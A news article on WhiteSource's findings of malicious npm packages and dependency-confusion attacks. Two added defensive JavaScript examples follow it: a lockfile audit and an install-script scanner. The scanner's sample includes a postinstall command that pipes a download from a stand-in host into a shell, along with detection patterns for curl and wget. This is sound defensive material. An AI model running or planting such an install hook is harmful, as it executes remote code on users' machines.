WhiteSource’s automated malware detection platform, WhiteSource Diffend, detected a total of 1,300 malicious packages on NPM over a six-month period ending in December 2021.
All malicious packages identified by WhiteSource were reported to NPM and subsequently removed from the package registry.
NPM has thus become a constant target of bad actors, according to WhiteSource. A recent report published by WhiteSource states that 57% of attacks occur on three days of the week: Friday, Saturday and Sunday. Most of these (81.7%) are “reconnaissance” attacks, in which attackers actively or passively gather information that can later be used to aid targeting. Another 14% of attacks aim to steal information such as login credentials and other sensitive details.
NPM attacks and their unique techniques
Some of the more recent malware detected by WhiteSource were:
- Mos-sass-loader and css-resources-loader: packages designed to imitate the popular style-resource-loader and sass-loader NPM packages; they inject malicious source code that downloads third-party info-stealers and also establishes connections for remote code execution (RCE);
- Circle-admin-web-app and browser-warning-ui: packages containing malicious code designed to download OS-specific external packages containing malware to initiate RCE;
- Noopenpaint: A troll package with no malicious code that launches a few applications out of order and says “You have been hacked”;
- @grubhubprod_cookbook: the package exploits dependency confusion to specifically target Grubhub, intercepting data and sending it to a remote location;
- Azure-web-pubsub-express: a security research package, with no malicious intent, that collects system data and network interface details and sends them to interactivesh.com;
- Reac1 and reect1: a pseudo-drill package masquerading as a research package that attempts to forward HTTP requests from the host system to webhook.com;
- Mrg-message-broker: similar to @grubhubprod_cookbook, uses dependency confusion to steal environment data;
- @sixt-web/api-client-sixt-v2-apps: another dependency confusion package that aggregates system data on installation;
- @maui-mf/app-auth: a potential Server Side Request Forgery (SSRF) attack package that probes the AWS instance metadata service for instance roles and sends them to an external spoofed domain.
Most of these attacks fall under four malicious threat categories, including cryptomining, data theft, botnets, and security research. The security research packages are those that masquerade as security research programs but actually include Remote Code Execution (RCE) to gain full access to a host.
Other less malicious packages included script kiddies and SEO hacks. “Script kiddies are packages that don’t do any harm or collect data, but instead throw up worrying messages like ‘You’ve been hacked,’” said Maciej Mansfeld, senior project manager at WhiteSource. “Some packages also try to exploit the fact that NPM displays the README of packages in its online registry to build SEO for their online presence. We have seen online casinos and adult websites trying to take advantage of this.”
Dependency confusion poses a major threat
In particular, the report warns about attacks that exploit dependency confusion in NPM, and notes that most malicious code does not even need to be downloaded manually for the attack to work.
“A dependency confusion attack is a type of supply chain attack that occurs when a package manager is tricked into providing malicious code instead of the intended code,” says Mansfeld. “The most well-known method to exploit this vulnerability is through a package manager’s prioritization mechanism to deploy the latest versions.”
In such cases, if attackers successfully find an internal dependency package name, they can create a public package with the same name and a higher version number. The malicious public package is then preferred by the package manager and automatically installed when an update is invoked.
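The mechanism described above, and a check a defender can run against it, as an added example that is not part of the article or of WhiteSource's tooling. The registry URLs, package names, versions and lockfile content are constructed for illustration; `@corp/` stands in for whatever scope an organisation uses for its internal packages, and the "internal registry" URL is an assumption.

```javascript
// Added example (not from the article): how a naive "highest version wins"
// lookup across two registries is hijacked by a public package with a higher
// version number, how a scoped lookup avoids it, and a lockfile audit that
// flags internal-looking packages resolved from the public registry.

// Compare two dotted versions numerically (major.minor.patch); pre-release
// tags are ignored for simplicity. Returns <0, 0 or >0 like a comparator.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Naive resolver: pool candidate versions from every registry and take the
// highest. This is the prioritisation behaviour the article describes.
function naiveResolve(name, registries) {
  let best = null;
  for (const reg of registries) {
    for (const v of reg.packages[name] || []) {
      if (!best || compareVersions(v, best.version) > 0) {
        best = { version: v, registry: reg.url };
      }
    }
  }
  return best;
}

// Scoped resolver: names matching an internal prefix are only ever looked up
// in the internal registry, mirroring an .npmrc scoped-registry mapping
// (assumption: every internal package carries such a prefix).
function scopedResolve(name, registries, internalRegistryUrl, internalPrefixes) {
  const isInternal = internalPrefixes.some((p) => name.startsWith(p));
  const allowed = isInternal
    ? registries.filter((r) => r.url === internalRegistryUrl)
    : registries;
  return naiveResolve(name, allowed);
}

// Lockfile audit over the lockfileVersion 2/3 "packages" map: report any
// internal-looking package whose "resolved" tarball URL is not on the
// internal registry.
function auditLockfile(lock, internalRegistryUrl, internalPrefixes) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // the root project entry
    const marker = 'node_modules/';
    const name = path.slice(path.lastIndexOf(marker) + marker.length);
    const isInternal = internalPrefixes.some((p) => name.startsWith(p));
    if (isInternal && !(entry.resolved || '').startsWith(internalRegistryUrl)) {
      findings.push({ name, version: entry.version, resolved: entry.resolved || '(none)' });
    }
  }
  return findings;
}

// Constructed sample data: an internal package at 1.4.x and a public
// look-alike at 99.0.0, plus a lockfile that already picked the wrong one.
const INTERNAL = 'https://npm.internal.example/';
const PUBLIC = 'https://registry.npmjs.org/';
const registries = [
  { url: INTERNAL, packages: { '@corp/cookbook': ['1.4.2', '1.4.3'] } },
  { url: PUBLIC, packages: { '@corp/cookbook': ['99.0.0'], lodash: ['4.17.21'] } },
];
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'app', version: '1.0.0' },
    'node_modules/@corp/cookbook': {
      version: '99.0.0',
      resolved: PUBLIC + '@corp/cookbook/-/cookbook-99.0.0.tgz',
    },
    'node_modules/lodash': {
      version: '4.17.21',
      resolved: PUBLIC + 'lodash/-/lodash-4.17.21.tgz',
    },
  },
};

console.log('naive  :', naiveResolve('@corp/cookbook', registries));
console.log('scoped :', scopedResolve('@corp/cookbook', registries, INTERNAL, ['@corp/']));
console.log('audit  :', auditLockfile(sampleLock, INTERNAL, ['@corp/']));
```

The audit is the part worth keeping in CI: a lockfile committed to the repository records where every tarball came from, so an internal name resolving to the public registry is visible before anything is installed.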
Here’s how to stay safe on NPM
The report recommends implementing a zero-trust policy on the system and only updating when you are sure about the contents of a package; being aware of the environment and following changes regularly; running continuous integration (CI) in an isolated stage; and keeping a close eye on the software development life cycle (SDLC).
According to Mansfeld, it is also good hygiene for NPM end users to watch for packages that download components which are then removed during installation, and to keep track of any open-source software (OSS) components in use.
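A concrete form of the install-time hygiene recommended above, as an added example that is not from the article or from WhiteSource: a pre-install review of a dependency's lifecycle scripts for signs of fetching or executing remote content, and a parser for the project's `.npmrc` that confirms install scripts are disabled and internal scopes are pinned to a registry. The detection patterns are a constructed heuristic to be tuned per environment, and the sample `package.json` and `.npmrc` contents are constructed.

```javascript
// Added example (not from the article): flag lifecycle scripts that look like
// they download or execute remote content at install time, and read the
// relevant hardening settings out of .npmrc.

// Scripts npm runs around installation; "prepare" also runs for git deps.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic patterns (constructed; tune for your environment). Each one
// commonly appears when an install script pulls in or decodes a payload.
const DOWNLOAD_PATTERNS = [
  /\bcurl\b/,
  /\bwget\b/,
  /\bInvoke-WebRequest\b/,
  /https?:\/\//i,
  /\bnode\s+-e\b/,
  /\bbase64\b/,
];

// Returns one finding per lifecycle hook present in package.json, marking
// it suspicious when any pattern matches the command line.
function flagInstallScripts(pkg) {
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const matched = DOWNLOAD_PATTERNS.filter((re) => re.test(cmd)).map((re) => re.source);
    findings.push({ hook, command: cmd, suspicious: matched.length > 0, matched });
  }
  return findings;
}

// Minimal .npmrc reader: key=value lines, '#' or ';' comments. Reports
// whether ignore-scripts is on and which scopes map to which registry.
function parseNpmrc(text) {
  const result = { ignoreScripts: false, scopedRegistries: {} };
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim();
    if (key === 'ignore-scripts') result.ignoreScripts = value === 'true';
    const m = key.match(/^(@[^:]+):registry$/);
    if (m) result.scopedRegistries[m[1]] = value;
  }
  return result;
}

// Constructed samples: one package whose postinstall pipes a download into a
// shell, one whose postinstall only runs a local build script.
const suspectPkg = {
  name: 'sample-suspect',
  version: '1.0.0',
  scripts: { postinstall: 'curl -s https://example.invalid/setup.sh | sh', test: 'mocha' },
};
const benignPkg = {
  name: 'sample-benign',
  version: '1.0.0',
  scripts: { postinstall: 'node ./scripts/build-native.js' },
};
const sampleNpmrc = [
  '# constructed .npmrc',
  '@corp:registry=https://npm.internal.example/',
  'ignore-scripts=true',
  'audit=true',
].join('\n');

console.log(flagInstallScripts(suspectPkg));
console.log(flagInstallScripts(benignPkg));
console.log(parseNpmrc(sampleNpmrc));
```

The `ignore-scripts=true` setting stops npm from running any lifecycle script during install, which removes the execution step most of the packages listed earlier depend on; packages that genuinely need a build step then have to be rebuilt explicitly, which is a deliberate review point rather than a side effect.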
Copyright © 2022 IDG Communications, Inc.